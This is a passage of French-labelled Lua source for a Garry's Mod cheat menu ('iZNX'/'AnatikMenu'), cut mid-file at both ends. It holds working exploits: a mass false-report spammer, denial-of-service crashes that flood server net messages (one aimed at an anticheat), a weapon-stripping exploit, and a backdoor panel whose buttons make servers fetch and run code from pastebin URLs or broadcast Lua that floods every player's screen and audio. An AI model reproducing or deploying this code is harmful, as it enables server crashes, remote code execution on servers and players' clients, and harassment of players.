  1595. iZNX.AddExploit( "Lokidev Report Spammer", {
  1596. desc = "Envoyer des Report sur tout le monde",
  1597. severity = 1,
  1598. scan = function() return iZNX.ValidNetString( "TransferReport" ) end,
  1599.  functi
  1600. { typ = "func", name = "Report Tout le Monde", func = function()
  1601. for k, v in pairs( player.GetAll() ) do
  1602. iZNX.NetStart( "TransferReport" )
  1603. net.WriteString( v:SteamID() )
  1604. net.WriteString( "SERVEUR CODER PAR LE Q" )
  1605. net.WriteString( "Bitch please" )
  1606. net.SendToServer()
  1607. end
  1608. end, },
  1609. },
  1610. } )
  1611. iZNX.AddExploit( "SAC Crash", {
  1612. desc = "Fait instantanément Crash n'importe quel serveur exécutant la simplicité anticheat",
  1613. severity = 3,
  1614. scan = function() return iZNX.ValidNetString( "SimplicityAC_aysent" ) end,
  1615.  functi
  1616. { typ = "func", name = "Crash", func = function()
  1617. local tbl = {}
  1618. for i=1,400 do
  1619. tbl[i] = i
  1620. end
  1621. iZNX.NetStart("SimplicityAC_aysent")
  1622. net.WriteUInt(1, 8)
  1623. net.WriteUInt(4294967295, 32)
  1624. net.WriteTable(tbl)
  1625. net.SendToServer()
  1626. end, },
  1627. },
  1628. } )
  1629. iZNX.AddExploit( "Crash Serveur", {
  1630. desc = "Cliquez sur ce bouton pour Crash le serveur instantanément.",
  1631. severity = 3,
  1632. scan = function() return iZNX.ValidNetString( "pac_to_contraption" ) end,
  1633.  functi
  1634. { typ = "func", name = "Crash", func = function()
  1635. local tbl = {}
  1636. for i=1,1000000000 do
  1637. tbl[#tbl + 1] = i
  1638. end
  1639. iZNX.NetStart("pac_to_contraption")
  1640. net.WriteTable( tbl )
  1641. net.SendToServer()
  1642. end, },
  1643. },
  1644. } )
  1645. local function nukeweapon( ent )
  1646. if !ent:IsValid() then return end
  1647. if ent.LNextNuke and ent.LNextNuke > CurTime() then return end
  1648. iZNX.NetStart("properties")
  1649. net.WriteString("remove")
  1650. net.WriteEntity( ent )
  1651. net.SendToServer()
  1652. ent.LNextNuke = CurTime() + 0.5
  1653. end
  1654. local function nukeallweapons( tab )
  1655. for k, v in pairs( tab ) do
  1656. if !v:IsValid() then continue end
  1657. if v.LNextNuke and v.LNextNuke > CurTime() then continue end
  1658. iZNX.NetStart("properties")
  1659. net.WriteString("remove")
  1660. net.WriteEntity( v )
  1661. net.SendToServer()
  1662. end
  1663. end
  1664. iZNX.AddExploit( "Strip les armes", {
  1665. desc = "Enlever les armes de n'importe quel fils de pute.",
  1666. severity = 3,
  1667. scan = function() return iZNX.ValidNetString( "properties" ) and (!FPP or (FPP and FPP.Settings.FPP_TOOLGUN1.worldprops == 1)) end,
  1668. functions = {
  1669. { typ = "string", name = "Type d'Arme à Strip", default = "*", addr = "stripper_gunz" },
  1670. { typ = "players", addr = "stripper_plyz" },
  1671. { typ = "func", name = "Strip", func = function()
  1672. if !timer.Exists( "stripclub" ) then
  1673. iZNX.ChatText( "Strip lancé" )
  1674. timer.Create( "stripclub", 0.5, 0, function()
  1675. local t = iZNX.GetStored( "stripper_plyz", {} )
  1676. for k, v in pairs( player.GetAll() ) do
  1677. if !table.HasValue( t, v ) then continue end
  1678. local gunz = v:GetWeapons()
  1679. local findstring = iZNX.GetStored( "stripper_gunz", "*" )
  1680. if findstring == "*" then nukeallweapons( gunz ) return end
  1681. local findstringtab = string.Explode( ", ", findstring )
  1682. for _, g in pairs( gunz ) do
  1683. for _, s in pairs( findstringtab ) do
  1684. if string.find( string.lower( g:GetClass() ), s ) then
  1685. nukeweapon( g )
  1686. end
  1687. end
  1688. end
  1689. end
  1690. end)
  1691. else
  1692. timer.Remove( "stripclub" )
  1693. iZNX.ChatText( "Strip stoppé" )
  1694. end
  1695. end, },
  1696. },
  1697. } )
  1698. function iZNX.MakeFunctionButton( parent, x, y, btext, func, tooltip)
  1699. if !parent:IsValid() then return end
  1700. local TButton = vgui.Create( "DButton" )
  1701. TButton:SetParent( parent )
  1702. TButton:SetPos( x, y )
  1703. TButton:SetText( btext )
  1704. TButton:SetTextColor( Color(255, 255, 255, 255) )
  1705. TButton:SizeToContents()
  1706. TButton:SetTall( 24 )
  1707. if tooltip then TButton:SetToolTip( tooltip ) end
  1708. TButton.Paint = function( self, w, h )
  1709. surface.SetDrawColor( Color(60, 60, 60, 200) )
  1710. surface.DrawRect( 0, 0, w, h )
  1711. surface.SetDrawColor( Color( 60, 60, 60 ) )
  1712. surface.SetMaterial( downgrad )
  1713. surface.DrawTexturedRect( 0, 0, w, h/ 2 )
  1714. surface.SetDrawColor( Color(100, 100, 100, 255) )
  1715. surface.DrawOutlinedRect( 0, 0, w, h )
  1716. end
  1717. TButton.DoClick = function()
  1718. func()
  1719. end
  1720. return TButton:GetWide(), TButton:GetTall()
  1721. end
  1722. function iZNX.HTXBackdoor( parent, x, y, btext )
  1723. if !parent:IsValid() then return end
  1724. local TButton = vgui.Create( "DButton" )
  1725. TButton:SetParent( parent )
  1726. TButton:SetPos( x, y )
  1727. TButton:SetText( btext )
  1728. TButton:SetTextColor( Color(255, 255, 255, 255) )
  1729. TButton:SizeToContents()
  1730. TButton:SetTall( 24 )
  1731. TButton.Paint = function( self, w, h )
  1732. surface.SetDrawColor( Color(100, 60, 60, 200) )
  1733. surface.DrawRect( 0, 0, w, h )
  1734. surface.SetDrawColor( Color( 60, 60, 60 ) )
  1735. surface.SetMaterial( downgrad )
  1736. surface.DrawTexturedRect( 0, 0, w, h/ 2 )
  1737. surface.SetDrawColor( Color(100, 100, 100, 255) )
  1738. surface.DrawOutlinedRect( 0, 0, w, h )
  1739. surface.SetDrawColor( Color(110, 70, 70, 255) )
  1740. surface.DrawOutlinedRect( 2, 2, w - 4, h - 4 )
  1741. end
  1742. TButton.DoClick = function()
  1743. iZNX.HTXCommandeListe()
  1744. end
  1745. return TButton:GetWide(), TButton:GetTall()
  1746. end
  1747. function iZNX.HTXCommandeListe()
  1748. if iZNX.HTXCommandeSelector and iZNX.HTXCommandeSelector:IsVisible() then iZNX.HTXCommandeSelector:Remove() end
  1749. iZNX.HTXCommandeSelector = vgui.Create("DFrame")
  1750. iZNX.HTXCommandeSelector:SetSize(240,350)
  1751. iZNX.HTXCommandeSelector:SetTitle("AnatikMenu")
  1752. iZNX.HTXCommandeSelector:SetPos( gui.MouseX(), gui.MouseY() )
  1753. iZNX.HTXCommandeSelector:MakePopup()
  1754. iZNX.HTXCommandeSelector.Paint = function( s, w, h )
  1755. if !iZNX.Menu or !iZNX.Menu:IsVisible() then s:Remove() return end
  1756. surface.SetDrawColor( Color(30, 30, 30, 245) )
  1757. surface.DrawRect( 0, 0, w, h )
  1758. surface.SetDrawColor( Color(55, 55, 55, 245) )
  1759. surface.DrawOutlinedRect( 0, 0, w, h )
  1760. surface.DrawOutlinedRect( 1, 1, w - 2, h - 2 )
  1761. end
  1762. local DScrollPanel = vgui.Create( "DScrollPanel", iZNX.HTXCommandeSelector )
  1763. DScrollPanel:Dock( FILL )
  1764. local commandnethtx16 = vgui.Create("DButton", DScrollPanel)
  1765. commandnethtx16:SetSize( 208, 20 )
  1766. commandnethtx16:SetPos( 2, 59 )
  1767. commandnethtx16:SetText("--------Spam Visuel/Sonore-------- ")
  1768. commandnethtx16:SetTextColor(Color(255, 255, 255, 255))
  1769. commandnethtx16.Paint = function(panel, w, h)
  1770. surface.SetDrawColor(100, 100, 100 ,255)
  1771. surface.DrawOutlinedRect(0, 0, w, h)
  1772. surface.SetDrawColor(255, 0, 0, 255)
  1773. surface.DrawRect(0, 0, w, h)
  1774. end
  1775. commandnethtx16.DoClick = function()
  1776. iZNX.NetStart(thefrenchenculer)
  1777. net.WriteString( "None" )
  1778. net.WriteBit(1)
  1779. net.SendToServer()
  1780. end
  1781. local commandnethtx14 = vgui.Create("DButton", DScrollPanel)
  1782. commandnethtx14:SetSize( 208, 20 )
  1783. commandnethtx14:SetPos( 2, 82 )
  1784. commandnethtx14:SetText("☢ Spam Visuel/Sonore 1 ☢")
  1785. commandnethtx14:SetTextColor(Color(255, 255, 255, 255))
  1786. commandnethtx14.Paint = function(panel, w, h)
  1787. surface.SetDrawColor(100, 100, 100 ,255)
  1788. surface.DrawOutlinedRect(0, 0, w, h)
  1789. surface.SetDrawColor(255, 0, 0, 255)
  1790. surface.DrawRect(0, 0, w, h)
  1791. end
  1792. commandnethtx14.DoClick = function()
  1793. net.Start(thefrenchenculer)
  1794. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/1ZYp5xJm\",function(b,l,h,c)RunString(b)end,nil)" )
  1795. net.WriteBit(1)
  1796. net.SendToServer()
  1797. end
  1798.  
  1799. local commandnethtx2 = vgui.Create("DButton", DScrollPanel)
  1800. commandnethtx2:SetSize( 208, 20 )
  1801. commandnethtx2:SetPos( 2, 106 )
  1802. commandnethtx2:SetText("☢ Spam Visuel/Sonore 2 ☢")
  1803. commandnethtx2:SetTextColor(Color(255, 255, 255, 255))
  1804. commandnethtx2.Paint = function(panel, w, h)
  1805. surface.SetDrawColor(100, 100, 100 ,255)
  1806. surface.DrawOutlinedRect(0, 0, w, h)
  1807. surface.SetDrawColor(255, 0, 0, 255)
  1808. surface.DrawRect(0, 0, w, h)
  1809. end
  1810. commandnethtx2.DoClick = function()
  1811. iZNX.NetStart(thefrenchenculer)
  1812. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SendLua([[local hud = vgui.Create(\"HTML\") hud:MoveToFront() hud:SetSize(200,158) hud:SetPos(0,0) hud:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531246-swag-dance.gif\")]]) v:SendLua([[local hud2 = vgui.Create(\"HTML\") hud2:MoveToFront() hud2:SetSize(200,158) hud2:SetPos(0,ScrH()-158) hud2:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531305-spin.gif\")]]) v:SendLua([[local hud3 = vgui.Create(\"HTML\") hud3:MoveToFront() hud3:SetSize(200,158) hud3:SetPos(ScrW()-200,0) hud3:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531246-swag-dance.gif\")]]) v:SendLua([[local hud4 = vgui.Create(\"HTML\") hud4:MoveToFront() hud4:SetSize(200,158) hud4:SetPos(ScrW()-200,ScrH()-158) hud4:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531305-spin.gif\")]]) timer.Create( \"spamsondeouf\", 1, 0, function() v:EmitSound( \"npc/stalker/go_alert2a.wav\", 100, 100 ) end) v:SendLua([[hook.Add(\"HUDPaint\",\"c\", function() draw.RoundedBox(0,0,0,ScrW(),ScrH(),Color(math.random(1,255),math.random(1,255),math.random(1,255),155)) end)]]) end BroadcastLua([[hook.Add( \"RenderScreenspaceEffects\", \"ohgod\", function() local sinScaler = math.sin( CurTime() *(RealFrameTime() *1024) ) DrawSharpen( 1 +(sinScaler *10), 0.5 +(sinScaler *2) ) DrawMaterialOverlay( \"effects/tp_eyefx/tpeye\", 1 ) end)]]) BroadcastLua([[timer.Create( \"thedrop\", 0.42, 0, function() util.ScreenShake( LocalPlayer():GetPos(), 512, 5, 0.25, 128 ) end )]]) BroadcastLua([[local hud3 = vgui.Create(\"HTML\") hud3:SetSize(400,300) hud3:SetPos(ScrW()/2-200,ScrH()/2-150) hud3:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531253-skel2.gif\")]])" )
  1813. net.WriteBit(1)
  1814. net.SendToServer()
  1815. end
  1816.  
  1817. local commandnethtx14 = vgui.Create("DButton", DScrollPanel)
  1818. commandnethtx14:SetSize( 208, 20 )
  1819. commandnethtx14:SetPos( 2, 130 )
  1820. commandnethtx14:SetText("☢ Spam Visuel/Sonore 3 ☢")
  1821. commandnethtx14:SetTextColor(Color(255, 255, 255, 255))
  1822. commandnethtx14.Paint = function(panel, w, h)
  1823. surface.SetDrawColor(100, 100, 100 ,255)
  1824. surface.DrawOutlinedRect(0, 0, w, h)
  1825. surface.SetDrawColor(255, 0, 0, 255)
  1826. surface.DrawRect(0, 0, w, h)
  1827. end
  1828. commandnethtx14.DoClick = function()
  1829. net.Start(thefrenchenculer)
  1830. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/n1S6xcqd\",function(b,l,h,c)RunString(b)end,nil)" )
  1831. net.WriteBit(1)
  1832. net.SendToServer()
  1833. end
  1834.  
  1835. local commandnethtx14 = vgui.Create("DButton", DScrollPanel)
  1836. commandnethtx14:SetSize( 208, 20 )
  1837. commandnethtx14:SetPos( 2, 154 )
  1838. commandnethtx14:SetText("☢ Spam Visuel/Sonore 4 ☢")
  1839. commandnethtx14:SetTextColor(Color(255, 255, 255, 255))
  1840. commandnethtx14.Paint = function(panel, w, h)
  1841. surface.SetDrawColor(100, 100, 100 ,255)
  1842. surface.DrawOutlinedRect(0, 0, w, h)
  1843. surface.SetDrawColor(255, 0, 0, 255)
  1844. surface.DrawRect(0, 0, w, h)
  1845. end
  1846. commandnethtx14.DoClick = function()
  1847. net.Start(thefrenchenculer)
  1848. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/zUbRUF3n\",function(b,l,h,c)RunString(b)end,nil)" )
  1849. net.WriteBit(1)
  1850. net.SendToServer()
  1851. end
  1852.  
  1853. local commandnethtx17 = vgui.Create("DButton", DScrollPanel)
  1854. commandnethtx17:SetSize( 208, 20 )
  1855. commandnethtx17:SetPos( 2, 178 )
  1856. commandnethtx17:SetText("☢ Spam Visuel/Sonore 5 ☢")
  1857. commandnethtx17:SetTextColor(Color(255, 255, 255, 255))
  1858. commandnethtx17.Paint = function(panel, w, h)
  1859. surface.SetDrawColor(100, 100, 100 ,255)
  1860. surface.DrawOutlinedRect(0, 0, w, h)
  1861. surface.SetDrawColor(255, 0, 0, 255)
  1862. surface.DrawRect(0, 0, w, h)
  1863. end
  1864. commandnethtx17.DoClick = function()
  1865. net.Start(thefrenchenculer)
  1866. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/d92nGZwL\",function(b,l,h,c)RunString(b)end,nil)" )
  1867. net.WriteBit(1)
  1868. net.SendToServer()
  1869. end
  1870.  
  1871. local commandnethtx16 = vgui.Create("DButton", DScrollPanel)
  1872. commandnethtx16:SetSize( 208, 20 )
  1873. commandnethtx16:SetPos( 2, 202 )
  1874. commandnethtx16:SetText("☢ Spam Visuel/Sonore 6 ☢")
  1875. commandnethtx16:SetTextColor(Color(255, 255, 255, 255))
  1876. commandnethtx16.Paint = function(panel, w, h)
  1877. surface.SetDrawColor(100, 100, 100 ,255)
  1878. surface.DrawOutlinedRect(0, 0, w, h)
  1879. surface.SetDrawColor(255, 0, 0, 255)
  1880. surface.DrawRect(0, 0, w, h)
  1881. end
  1882. commandnethtx16.DoClick = function()
  1883. iZNX.NetStart(thefrenchenculer)
  1884. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/VYxJLpMb\",function(b,l,h,c)RunString(b)end,nil)" )
  1885. net.WriteBit(1)
  1886. net.SendToServer()
  1887. end
  1888.  
  1889. local commandnethtx16 = vgui.Create("DButton", DScrollPanel)
  1890. commandnethtx16:SetSize( 208, 20 )
  1891. commandnethtx16:SetPos( 2, 226 )
  1892. commandnethtx16:SetText("☢ Spam Visuel/Sonore 7 ☢")
  1893. commandnethtx16:SetTextColor(Color(255, 255, 255, 255))
  1894. commandnethtx16.Paint = function(panel, w, h)
  1895. surface.SetDrawColor(255, 255, 255, 255)
  1896. surface.DrawOutlinedRect(0, 0, w, h)
  1897. surface.SetDrawColor(255, 0, 0, 255)
  1898. surface.DrawRect(0, 0, w, h)
  1899. end
  1900. commandnethtx16.DoClick = function()
  1901. iZNX.NetStart(thefrenchenculer)
  1902. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/qxzc5jmT\",function(b,l,h,c)RunString(b)end,nil)" )
  1903. net.WriteBit(1)
  1904. net.SendToServer()
  1905. end
  1906.  
  1907. local commandnethtx16 = vgui.Create("DButton", DScrollPanel)
  1908. commandnethtx16:SetSize( 208, 20 )
  1909. commandnethtx16:SetPos( 2, 249 )
  1910. commandnethtx16:SetText("--------SoundBoard--------")
  1911. commandnethtx16:SetTextColor(Color(255, 255, 255, 255))
  1912. commandnethtx16.Paint = function(panel, w, h)
  1913. surface.SetDrawColor(100, 100, 100 ,255)
  1914. surface.DrawOutlinedRect(0, 0, w, h)
  1915. surface.SetDrawColor(56, 212, 43, 255)
  1916. surface.DrawRect(0, 0, w, h)
  1917. end
  1918. commandnethtx16.DoClick = function()
  1919. iZNX.NetStart(thefrenchenculer)
  1920. net.WriteString( "None" )
  1921. net.WriteBit(1)
  1922. net.SendToServer()
  1923. end
  1924. local commandnethtx15 = vgui.Create("DButton", DScrollPanel)
  1925. commandnethtx15:SetSize( 208, 20 )
  1926. commandnethtx15:SetPos( 2, 272 )
  1927. commandnethtx15:SetText("Musique - Be Friend")
  1928. commandnethtx15:SetTextColor(Color(255, 255, 255, 255))
  1929. commandnethtx15.Paint = function(panel, w, h)
  1930. surface.SetDrawColor(100, 100, 100 ,255)
  1931. surface.DrawOutlinedRect(0, 0, w, h)
  1932. surface.SetDrawColor(56, 212, 43, 255)
  1933. surface.DrawRect(0, 0, w, h)
  1934. end
  1935. commandnethtx15.DoClick = function()
  1936. iZNX.NetStart(thefrenchenculer)
  1937. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/whcant.mp3\", \"mono\", function()end )]])")
  1938. net.WriteBit (1)
  1939. net.SendToServer()
  1940. end
  1941. local commandnethtx16 = vgui.Create("DButton", DScrollPanel)
  1942. commandnethtx16:SetSize( 208, 20 )
  1943. commandnethtx16:SetPos( 2, 295 )
  1944. commandnethtx16:SetText("Musique - Salut c'est cool")
  1945. commandnethtx16:SetTextColor(Color(255, 255, 255, 255))
  1946. commandnethtx16.Paint = function(panel, w, h)
  1947. surface.SetDrawColor(100, 100, 100 ,255)
  1948. surface.DrawOutlinedRect(0, 0, w, h)
  1949. surface.SetDrawColor(56, 212, 43, 255)
  1950. surface.DrawRect(0, 0, w, h)
  1951. end
  1952. commandnethtx16.DoClick = function()
  1953. iZNX.NetStart(thefrenchenculer)
  1954. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/salutccool.mp3\", \"mono\", function()end )]])")
  1955. net.WriteBit (1)
  1956. net.SendToServer()
  1957. end
  1958. local commandnethtx17 = vgui.Create("DButton", DScrollPanel)
  1959. commandnethtx17:SetSize( 208, 20 )
  1960. commandnethtx17:SetPos( 2, 318 )
  1961. commandnethtx17:SetText("Musique - Tenir ta main")
  1962. commandnethtx17:SetTextColor(Color(255, 255, 255, 255))
  1963. commandnethtx17.Paint = function(panel, w, h)
  1964. surface.SetDrawColor(100, 100, 100 ,255)
  1965. surface.DrawOutlinedRect(0, 0, w, h)
  1966. surface.SetDrawColor(56, 212, 43, 255)
  1967. surface.DrawRect(0, 0, w, h)
  1968. end
  1969. commandnethtx17.DoClick = function()
  1970. iZNX.NetStart(thefrenchenculer)
  1971. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/Grégoire.mp3\", \"mono\", function()end )]])")
  1972. net.WriteBit(1)
  1973. net.SendToServer()
  1974. end
  1975. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  1976. commandnethtx1000:SetSize( 208, 20 )
  1977. commandnethtx1000:SetPos( 2, 341 )
  1978. commandnethtx1000:SetText("Musique - Wesh Alors [JUL]")
  1979. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  1980. commandnethtx1000.Paint = function(panel, w, h)
  1981. surface.SetDrawColor(100, 100, 100 ,255)
  1982. surface.DrawOutlinedRect(0, 0, w, h)
  1983. surface.SetDrawColor(56, 212, 43, 255)
  1984. surface.DrawRect(0, 0, w, h)
  1985. end
  1986. commandnethtx1000.DoClick = function()
  1987. iZNX.NetStart(thefrenchenculer)
  1988. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/wesh.mp3\", \"mono\", function()end )]])")
  1989. net.WriteBit (1)
  1990. net.SendToServer()
  1991. end
  1992. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  1993. commandnethtx1000:SetSize( 208, 20 )
  1994. commandnethtx1000:SetPos( 2, 364 )
  1995. commandnethtx1000:SetText("Musique - MondotekAlive")
  1996. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  1997. commandnethtx1000.Paint = function(panel, w, h)
  1998. surface.SetDrawColor(100, 100, 100 ,255)
  1999. surface.DrawOutlinedRect(0, 0, w, h)
  2000. surface.SetDrawColor(56, 212, 43, 255)
  2001. surface.DrawRect(0, 0, w, h)
  2002. end
  2003. commandnethtx1000.DoClick = function()
  2004. iZNX.NetStart(thefrenchenculer)
  2005. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/Mondotek - Alive (Ph Electro Remix).mp3\", \"mono\", function()end )]])")
  2006. net.WriteBit (1)
  2007. net.SendToServer()
  2008. end
  2009. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2010. commandnethtx1000:SetSize( 208, 20 )
  2011. commandnethtx1000:SetPos( 2, 387 )
  2012. commandnethtx1000:SetText("Musique - Un éléphant ")
  2013. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2014. commandnethtx1000.Paint = function(panel, w, h)
  2015. surface.SetDrawColor(100, 100, 100 ,255)
  2016. surface.DrawOutlinedRect(0, 0, w, h)
  2017. surface.SetDrawColor(56, 212, 43, 255)
  2018. surface.DrawRect(0, 0, w, h)
  2019. end
  2020. commandnethtx1000.DoClick = function()
  2021. iZNX.NetStart(thefrenchenculer)
  2022. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/Un éléphant qui se balançait.mp3\", \"mono\", function()end )]])")
  2023. net.WriteBit (1)
  2024. net.SendToServer()
  2025. end
  2026. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2027. commandnethtx1000:SetSize( 208, 20 )
  2028. commandnethtx1000:SetPos( 2, 410 )
  2029. commandnethtx1000:SetText("Musique - Chuis bo ")
  2030. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2031. commandnethtx1000.Paint = function(panel, w, h)
  2032. surface.SetDrawColor(100, 100, 100 ,255)
  2033. surface.DrawOutlinedRect(0, 0, w, h)
  2034. surface.SetDrawColor(56, 212, 43, 255)
  2035. surface.DrawRect(0, 0, w, h)
  2036. end
  2037. commandnethtx1000.DoClick = function()
  2038. iZNX.NetStart(thefrenchenculer)
  2039. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/chuis bo.mp3\", \"mono\", function()end )]])")
  2040. net.WriteBit (1)
  2041. net.SendToServer()
  2042. end
  2043. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2044. commandnethtx1000:SetSize( 208, 20 )
  2045. commandnethtx1000:SetPos( 2, 434 )
  2046. commandnethtx1000:SetText("Musique - Pouet pouet")
  2047. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2048. commandnethtx1000.Paint = function(panel, w, h)
  2049. surface.SetDrawColor(100, 100, 100 ,255)
  2050. surface.DrawOutlinedRect(0, 0, w, h)
  2051. surface.SetDrawColor(56, 212, 43, 255)
  2052. surface.DrawRect(0, 0, w, h)
  2053. end
  2054. commandnethtx1000.DoClick = function()
  2055. iZNX.NetStart(thefrenchenculer)
  2056. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/chuis bo.mp3\", \"mono\", function()end )]])")
  2057. net.WriteBit (1)
  2058. net.SendToServer()
  2059. end
  2060. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2061. commandnethtx1000:SetSize( 208, 20 )
  2062. commandnethtx1000:SetPos( 2, 457 )
  2063. commandnethtx1000:SetText("Musique - Pirouette")
  2064. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2065. commandnethtx1000.Paint = function(panel, w, h)
  2066. surface.SetDrawColor(100, 100, 100 ,255)
  2067. surface.DrawOutlinedRect(0, 0, w, h)
  2068. surface.SetDrawColor(56, 212, 43, 255)
  2069. surface.DrawRect(0, 0, w, h)
  2070. end
  2071. commandnethtx1000.DoClick = function()
  2072. iZNX.NetStart(thefrenchenculer)
  2073. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/Pirouette, cacahuète - Il était un petit homme.mp3\", \"mono\", function()end )]])")
  2074. net.WriteBit (1)
  2075. net.SendToServer()
  2076. end
  2077. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2078. commandnethtx1000:SetSize( 208, 20 )
  2079. commandnethtx1000:SetPos( 2, 481 )
  2080. commandnethtx1000:SetText("Musique - Pomme api")
  2081. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2082. commandnethtx1000.Paint = function(panel, w, h)
  2083. surface.SetDrawColor(100, 100, 100 ,255)
  2084. surface.DrawOutlinedRect(0, 0, w, h)
  2085. surface.SetDrawColor(56, 212, 43, 255)
  2086. surface.DrawRect(0, 0, w, h)
  2087. end
  2088. commandnethtx1000.DoClick = function()
  2089. iZNX.NetStart(thefrenchenculer)
  2090. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/Pomme de reinette et pomme d'api.mp3\", \"mono\", function()end )]])")
  2091. net.WriteBit (1)
  2092. net.SendToServer()
  2093. end
  2094. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2095. commandnethtx1000:SetSize( 208, 20 )
  2096. commandnethtx1000:SetPos( 2, 505 )
  2097. commandnethtx1000:SetText("Musique - Gipsy")
  2098. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2099. commandnethtx1000.Paint = function(panel, w, h)
  2100. surface.SetDrawColor(100, 100, 100 ,255)
  2101. surface.DrawOutlinedRect(0, 0, w, h)
  2102. surface.SetDrawColor(56, 212, 43, 255)
  2103. surface.DrawRect(0, 0, w, h)
  2104. end
  2105. commandnethtx1000.DoClick = function()
  2106. iZNX.NetStart(thefrenchenculer)
  2107. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/L'araignée Gipsy.mp3\", \"mono\", function()end )]])")
  2108. net.WriteBit (1)
  2109. net.SendToServer()
  2110. end
  2111. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2112. commandnethtx1000:SetSize( 208, 20 )
  2113. commandnethtx1000:SetPos( 2, 530 )
  2114. commandnethtx1000:SetText("Soundboard - Karim")
  2115. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2116. commandnethtx1000.Paint = function(panel, w, h)
  2117. surface.SetDrawColor(100, 100, 100 ,255)
  2118. surface.DrawOutlinedRect(0, 0, w, h)
  2119. surface.SetDrawColor(56, 212, 43, 255)
  2120. surface.DrawRect(0, 0, w, h)
  2121. end
  2122. commandnethtx1000.DoClick = function()
  2123. iZNX.NetStart(thefrenchenculer)
  2124. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/KARIM.mp3\", \"mono\", function()end )]])")
  2125. net.WriteBit (1)
  2126. net.SendToServer()
  2127. end
  2128. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2129. commandnethtx1000:SetSize( 208, 20 )
  2130. commandnethtx1000:SetPos( 2, 555 )
  2131. commandnethtx1000:SetText("Soundboard - AAAAAAH")
  2132. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2133. commandnethtx1000.Paint = function(panel, w, h)
  2134. surface.SetDrawColor(100, 100, 100 ,255)
  2135. surface.DrawOutlinedRect(0, 0, w, h)
  2136. surface.SetDrawColor(56, 212, 43, 255)
  2137. surface.DrawRect(0, 0, w, h)
  2138. end
  2139. commandnethtx1000.DoClick = function()
  2140. iZNX.NetStart(thefrenchenculer)
  2141. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/AHHHHHHHHHHHHHHHHH.wav\", \"mono\", function()end )]])")
  2142. net.WriteBit (1)
  2143. net.SendToServer()
  2144. end
  2145. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2146. commandnethtx1000:SetSize( 208, 20 )
  2147. commandnethtx1000:SetPos( 2, 580 )
  2148. commandnethtx1000:SetText("Soundboard - Code avec le cul")
  2149. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2150. commandnethtx1000.Paint = function(panel, w, h)
  2151. surface.SetDrawColor(100, 100, 100 ,255)
  2152. surface.DrawOutlinedRect(0, 0, w, h)
  2153. surface.SetDrawColor(56, 212, 43, 255)
  2154. surface.DrawRect(0, 0, w, h)
  2155. end
  2156. commandnethtx1000.DoClick = function()
  2157. iZNX.NetStart(thefrenchenculer)
  2158. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/code.mp3\", \"mono\", function()end )]])")
  2159. net.WriteBit (1)
  2160. net.SendToServer()
  2161. end
  2162. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2163. commandnethtx1000:SetSize( 208, 20 )
  2164. commandnethtx1000:SetPos( 2, 605 )
  2165. commandnethtx1000:SetText("Soundboard - WALLAH")
  2166. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2167. commandnethtx1000.Paint = function(panel, w, h)
  2168. surface.SetDrawColor(100, 100, 100 ,255)
  2169. surface.DrawOutlinedRect(0, 0, w, h)
  2170. surface.SetDrawColor(56, 212, 43, 255)
  2171. surface.DrawRect(0, 0, w, h)
  2172. end
  2173. commandnethtx1000.DoClick = function()
  2174. iZNX.NetStart(thefrenchenculer)
